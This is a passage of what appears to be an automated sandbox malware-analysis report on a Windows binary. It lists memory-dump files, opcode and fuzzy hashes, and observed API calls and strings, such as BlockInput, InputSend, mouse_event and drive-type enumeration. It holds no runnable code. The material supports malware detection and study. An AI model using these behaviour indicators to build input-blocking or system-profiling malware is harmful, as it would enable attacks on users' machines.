      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: Variable is not of type 'Object'.
      • API String ID: 0-1840281001
      • Opcode ID: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
      • Instruction ID: 4c1b4c3f8a78f8ba34b84132f015717dd40910522af2bdbe2958364ef672e718
      • Opcode Fuzzy Hash: 085062051d8c6d05dddc6329c8930327e2f409664b9aa2ab8e8b8fd8cd37859f
      • Instruction Fuzzy Hash: EE52833AA08642AAFB50EF60D0426FCA3B1EB65788FD041B1DE0D57695DF38E545F360
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: no error
      • API String ID: 0-1106124726
      • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
      • Instruction ID: 1129287c7e5884f646f0044744d4bfca8057134b590c24db7048695e3ba0a939
      • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
      • Instruction Fuzzy Hash: 1F12DC7AA087819AF724DF25E4416ADB3B1FB44788B908135EE4E47B94DB38EA40E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: LocalTime
      • String ID:
      • API String ID: 481472006-0
      • Opcode ID: 43d34cb52622ca6b40e86063685fd79a303f7b62810161daa31da2e35dc37d7b
      • Instruction ID: 581ed40d9bd86c6851ca0f0f6047a0f631b2b87e1250de8eb755caeb0a4a33d1
      • Opcode Fuzzy Hash: 43d34cb52622ca6b40e86063685fd79a303f7b62810161daa31da2e35dc37d7b
      • Instruction Fuzzy Hash: 80419F5AB55792A0FA04EF21E4020FDA3B0BF90B80B859976DF1D17B95EE3CE115E321
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: InputSend
      • String ID:
      • API String ID: 3431551938-0
      • Opcode ID: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
      • Instruction ID: 86945770ffce67cab1933ca56a275198cf25bee5932319e600c54eed580eae7d
      • Opcode Fuzzy Hash: f56fcc02370cedd2e246ff2304cc88798786294839e2fbad01620a5262f8ee40
      • Instruction Fuzzy Hash: 2AF0B46691C5D0DAE3209F11E44176AB7A0F79874DF405115FB8947B54CB3EC109AF04
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: BlockInput
      • String ID:
      • API String ID: 3456056419-0
      • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
      • Instruction ID: 7522aa14ca64b71b9b695e03a8d7d0079ce7757adba6dc4cd1ce01bb77a8c085
      • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
      • Instruction Fuzzy Hash: CFE0653671820296FB48AB61E08267DE2A0AB98BC4F549074DA0D87355DF7CD890A710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: mouse_event
      • String ID:
      • API String ID: 2434400541-0
      • Opcode ID: 6674be8b64349246c9dd3b232f8eab8a138cd1fe159d5217082064005974ec36
      • Instruction ID: 5704054986b603f709d2558f520f0183796b0d48c26f13a1927984d99ab129b2
      • Opcode Fuzzy Hash: 6674be8b64349246c9dd3b232f8eab8a138cd1fe159d5217082064005974ec36
      • Instruction Fuzzy Hash: E3E09A6EE4816276F3683A38452BB348752ABE1300ED203B0EA0D02AE4CD0DA605F620
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: NameUser
      • String ID:
      • API String ID: 2645101109-0
      • Opcode ID: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
      • Instruction ID: e05d96de321edf8571fa38c90e65719f33e1c1862be086354e7234e3f5d9c3e7
      • Opcode Fuzzy Hash: 8585f7f64f3c872cdf94fb193dbdc54333e80748829e3d3e151e5918de675c21
      • Instruction Fuzzy Hash: DAC01275614652E9F760DF20D8845DC3330FB1075CFC04021E60E5E4A89F788248D300
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: 0
      • API String ID: 3215553584-4108050209
      • Opcode ID: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
      • Instruction ID: e098cdc613cabc111f97000e4f31441facfec826d2885c721da2d20f7da9efe3
      • Opcode Fuzzy Hash: e36cd3313365073150127e4babc7a8598c5f16c08797db25288978382bee99ce
      • Instruction Fuzzy Hash: F2817F29A1A18362FB64AA55704A17EE3B4EF81744FD41771DF0E87685CF2DE806F360
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID: 0
      • API String ID: 3215553584-4108050209
      • Opcode ID: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
      • Instruction ID: c7a30bff42cc2902b2dd7283a345dcec34e2c05f8932ec2a1867529db9b61487
      • Opcode Fuzzy Hash: 1b448239c859d57582f3fa817e0dbfe1db0dd889c5120d72b994c6c156eeceba
      • Instruction Fuzzy Hash: FF712D2DA0E6C36AFB64AA14704627ED3B09F41744F9407B1DF08CB6D5CE2DE846BB21
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID: @
      • API String ID: 0-2766056989
      • Opcode ID: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
      • Instruction ID: 14a608b08495d0a2144086fcfc843e3ddc9d4c15694df4a18cddf83fb95ee8a5
      • Opcode Fuzzy Hash: 16c5ff97d355010ed637a1ec5e52f006fc41d4859a4220ae5f264295bc75ec93
      • Instruction Fuzzy Hash: F041C436714B489AFA04DF2AD5152A9B7A1F78CFD4B8AA036DE0D87754DE3CD445E300
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
      • Instruction ID: 612b7e70c5d61d10099bf6c826e3e7ea91340d80fae2962dce17858641cfd383
      • Opcode Fuzzy Hash: d8796869ba0ff200981f3c8b4e50b33a6e54c2853832a264e2eb0800a33b39bf
      • Instruction Fuzzy Hash: 5A52D53AE0C642A3FA24EB10E056A7CA375EF65B94F9945B1DA1E076C5CF3CE440E360
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Concurrency::cancel_current_task
      • String ID:
      • API String ID: 118556049-0
      • Opcode ID: 35c80bf2167e1adf3206c92da48ca8911fbd9c742f77449b7ac1ea58a5065b47
      • Instruction ID: e4de52e7f81b35c1a0483c1478bbb860f8fc4fcdd57113be81f26c7d426179a9
      • Opcode Fuzzy Hash: 35c80bf2167e1adf3206c92da48ca8911fbd9c742f77449b7ac1ea58a5065b47
      • Instruction Fuzzy Hash: 1952D17AB09642A9FB10EF65E4412BD73B2EB84B98F804271DE1E577C9DE38E405E350
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ba15eac96ed8fc0baf8485493d847c633669c4d8f9813435fd29586b96ba1c43
      • Instruction ID: adc0c4a17353d6a9b770c8d7925afd495a7c3dd2b04de0ae21d78aa1f6e3140d
      • Opcode Fuzzy Hash: ba15eac96ed8fc0baf8485493d847c633669c4d8f9813435fd29586b96ba1c43
      • Instruction Fuzzy Hash: 7E42A03AA08782A6FB10EB25E4821BDB7B0FB84798F904175DE5D47B95DF38E441E710
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
      • Instruction ID: f66ff79ea5091b99ffa0c3ce6f9535086e41173207ca59180bd9cd3d7ab6a619
      • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
      • Instruction Fuzzy Hash: 99426725D29E5AA4F253EB35A413535A72CBFD63C0F818377F81EB6A61DF2CA4427210
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
      • Instruction ID: 8dfd510bdeed2bae0fba9f04394835b5ae5cfe434c7e54b77faa8d320d67f1a4
      • Opcode Fuzzy Hash: 8d8f3e37eadd19746a70c291c5831625e20ba123285d38ae931568fef80f1606
      • Instruction Fuzzy Hash: 9E712D2AE0C75356F734AA298C42B3CE2C1AFC0360F9446B4E65E47AC5DE7DE840B720
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
      • Instruction ID: ec1f18e026821ca8bdbddad7849cf3bf3dcf59dc297d55a0a2118897b18f2296
      • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
      • Instruction Fuzzy Hash: 3521D177A2414196FB0DDF75D853AA973A5B3A4708F48C17AD52B83684CE3CE904E790
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
      • Instruction ID: cc1ca8a52e1d9493f37223d812746616f188c38e516da8c7d645a5f013802c2f
      • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
      • Instruction Fuzzy Hash: 9AF04475B282559BEB94DF6CA4436397790E74C380B908079D58983E44DA3CD091AF14
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
      • Instruction ID: 68833f8ba28b692bdf482c0950604b931fa4d7bd649c87d2f44fb3ac2e581a1e
      • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
      • Instruction Fuzzy Hash: 0FA0022D90FC53F8F608AB00F862030A335FB90320BD205B2E14D815659F3CA480F720
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
      • String ID:
      • API String ID: 3521893082-0
      • Opcode ID: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
      • Instruction ID: 40a37f868a898b752471634a2d5a60b48dd6962f3af09e3eaa8a1f612db0ad34
      • Opcode Fuzzy Hash: ef7366886db55824d460b1c50baab5321c9adbfaa8eab0a2c69b3322450da6b5
      • Instruction Fuzzy Hash: 2EA1D53AF04A029AFB14AB61D88657C6761BBC8B64F904334DE2E53BD5DF3C9544B360
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorMode$DriveType
      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
      • API String ID: 2907320926-4222207086
      • Opcode ID: b77a1df8e0786f3ae6df23b49277aad935363f16f1a357679b0fc8cc9e6328f5
      • Instruction ID: e864da3a396e678572a17faaa1f4e4baf0b0f0b34c7dbabf8a3ffdee67d1bc6c
      • Opcode Fuzzy Hash: b77a1df8e0786f3ae6df23b49277aad935363f16f1a357679b0fc8cc9e6328f5
      • Instruction Fuzzy Hash: B2B1A3AAB0CA03B8FE54FB15D5421B8E7A1BBC0794BD441B5D90E47699EF2CE944B320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
      • String ID:
      • API String ID: 1996641542-0
      • Opcode ID: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
      • Instruction ID: f1d30e41be2ff7b83c8034ee2e3e762c032e9a09fe73538199cc5a203b0a15cb
      • Opcode Fuzzy Hash: be73899effbf77ebd9d54faa89356d5f551f326618c8bd974714f6933a768820
      • Instruction Fuzzy Hash: 6C71933AA08A4196F724EB11E88567AB365FBC9BB0F804374ED5E83B94DF3CD444A710
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
